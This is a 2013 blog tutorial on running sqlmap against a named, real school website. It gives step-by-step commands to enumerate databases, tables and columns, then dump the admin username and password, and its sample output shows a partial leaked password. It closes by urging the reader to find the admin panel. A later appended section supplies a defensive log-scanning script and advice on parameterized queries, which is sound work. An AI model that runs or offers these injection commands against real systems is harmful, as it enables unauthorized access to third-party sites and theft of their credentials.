Wednesday, 7 August 2013

SQLmap Step by Step Tutorial

Today we will learn how to operate the "best SQL injection exploiting tool", i.e. SQLMAP.
It's a Python tool, and it is preloaded in almost every BackTrack version.

First of all, we need a vulnerable target!
Here it is:
http://www.alliedschools.edu.pk/main_news.php?news_id=52
OK, the first step is to fetch the databases.
The command will look like this:

 python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 --dbs

here:-
       -u specifies the URL which is vulnerable to SQL injection
 and   --dbs is used for fetching all the databases in the website :D



OK, after the process of fetching the databases completes, it will show something like this:

available databases(8)
[*]information_schema
[*]alliedschools_web
Now we are going to exploit the database alliedschools_web and fetch the tables present in it XD

ok command will change a little bit :-

python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_web --tables

here :-
        -D is followed by the name of the database from which we want to fetch tables, and
        --tables is for fetching all the tables present in the database

After processing, we will get the tables present in the database "alliedschools_web", something like this:
  Database: alliedschools_campus
   [18 Tables ]
   admin
   campus
   ......
   ......
Now we are going to fetch the columns from the table admin of the database alliedschools_campus.

  The command is :-
               python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin --columns



now we will get something like this 
   Database: alliedschools_campus
   Table : admin 
   [12 columns ]
    admin_password
    admin_username
    admin_email
    ......
    ......

 This is the last command, to get the admin username and password.
   The command is:
             python ./sqlmap.py -u http://www.alliedschools.edu.pk/main_news.php?news_id=52 -D alliedschools_campus -T admin -C admin_password,admin_username --dump
And after the process finishes we will get something like this:
     Database: alliedschools_campus
     Table : admin 
      [6 entries]
     admin_password   admin_username
     $erver             admin
     ......             ......
Now You Have admin Password of website, Find admin panel and ...xD
Credits To : Zero & Team indishell :D
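
From the defender's side, the commands above leave a recognisable trail in the web server's access log. The following is an added example, not part of the original post or of sqlmap: it flags requests whose news_id is not a plain integer, sqlmap's default User-Agent, and references to the information_schema views that correspond to --dbs, --tables and --columns. It assumes a MySQL back end and combined-format logs; the log lines, IP addresses, and the function names classify and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format); IPs are documentation placeholders.
SAMPLE_LOG = '''\
198.51.100.7 - - [07/Aug/2013:10:00:01 +0000] "GET /main_news.php?news_id=52 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Aug/2013:10:01:12 +0000] "GET /main_news.php?news_id=52%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [07/Aug/2013:10:01:40 +0000] "GET /main_news.php?news_id=52%20UNION%20SELECT%20schema_name%20FROM%20information_schema.schemata HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Aug/2013:10:02:05 +0000] "GET /main_news.php?news_id=52%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables HTTP/1.1" 200 930 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Aug/2013:10:02:31 +0000] "GET /main_news.php?news_id=52%20UNION%20SELECT%20column_name%20FROM%20information_schema.columns HTTP/1.1" 200 901 "-" "Mozilla/5.0"
'''

LINE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"')
# MySQL information_schema view -> the sqlmap switch from the tutorial that reads it
STAGES = {
    "information_schema.schemata": "--dbs",
    "information_schema.tables": "--tables",
    "information_schema.columns": "--columns",
}

def classify(line, param="news_id"):
    """Return (client_ip, [reasons]) for one log line, or None if nothing is flagged."""
    m = LINE.match(line)
    if not m:
        return None
    ip, target, agent = m.groups()
    reasons = []
    if agent.lower().startswith("sqlmap/"):  # default UA; easily changed, so only one signal
        reasons.append("sqlmap user-agent")
    # parse_qs percent-decodes the parameter values before we inspect them
    for value in parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, []):
        if not value.isdigit():  # a news id should only ever be an integer
            reasons.append("non-integer " + param)
        for view, switch in STAGES.items():
            if view in value.lower():
                reasons.append("enumeration like " + switch)
    return (ip, reasons) if reasons else None

def scan(log_text):
    """Collect the distinct reasons per client IP, in order of first appearance."""
    findings = {}
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            seen = findings.setdefault(hit[0], [])
            for reason in hit[1]:
                if reason not in seen:
                    seen.append(reason)
    return findings
```

The same integer check, applied in main_news.php before the query is built and combined with a parameterized query, is what stops the injection in the first place.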